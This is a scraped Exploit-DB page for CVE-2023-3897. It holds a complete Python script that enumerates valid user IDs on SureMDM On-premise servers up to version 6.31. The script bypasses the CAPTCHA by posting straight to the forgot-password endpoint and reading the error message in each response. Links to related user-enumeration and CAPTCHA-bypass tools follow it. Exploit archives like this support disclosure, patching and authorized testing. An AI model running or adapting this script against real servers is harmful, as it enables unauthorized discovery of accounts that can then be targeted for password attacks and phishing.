[webapps] SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration

6 months ago

source link: https://www.exploit-db.com/exploits/51804
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration

EDB-ID:

51804

Platform:

Date:

2024-02-19

Vulnerable App:

# Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
# Date: 05/12/2023
# Exploit Author: Jonas Benjamin Friedli
# Vendor Homepage: https://www.42gears.com/products/mobile-device-management/
# Version: <= 6.31
# Tested on: 6.31
# CVE : CVE-2023-3897

import requests
import sys

def print_help():
    print("Usage: python script.py [URL] [UserListFile]")
    sys.exit(1)


def main():
    if len(sys.argv) != 3 or sys.argv[1] == '-h':
        print_help()

    url, user_list_file = sys.argv[1], sys.argv[2]

    try:
        with open(user_list_file, 'r') as file:
            users = file.read().splitlines()
    except FileNotFoundError:
        print(f"User list file '{user_list_file}' not found.")
        sys.exit(1)

    valid_users = []
    bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest"
    enumerate_txt = "This User ID/Email ID is not registered."
    for index, user in enumerate(users):
        progress = (index + 1) / len(users) * 100
        print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r")

        data = {"UserId": user}
        response = requests.post(
            f"{url}{bypass_dir}",
            json=data,
            headers={"Content-Type": "application/json; charset=utf-8"}
        )

        if response.status_code == 200:
            response_data = response.json()
            if enumerate_txt not in response_data.get('d', {}).get('message', ''):
                valid_users.append(user)

    print("\nFinished processing users.")
    print(f"Valid Users Found: {len(valid_users)}")
    for user in valid_users:
        print(user)

if __name__ == "__main__":
    main()

Copy

Recommend

Github github.com 3 years ago
Cache

GitHub - immunIT/TeamsUserEnum: User enumeration with Microsoft Teams API

UserEnumTeams Description Sometimes user enumeration could be sometimes useful during the reconnaissance of an assessment. This tool will determine if an email is registered on teams or not. More details on the

dev.to 2 years ago
Cache

How to use 2Captcha and bypass Captcha

Disclaimer: This information is for educational purposes only. What does Captcha mean? Captcha is a security measure used to distinguish between computer and human behavior. It is al...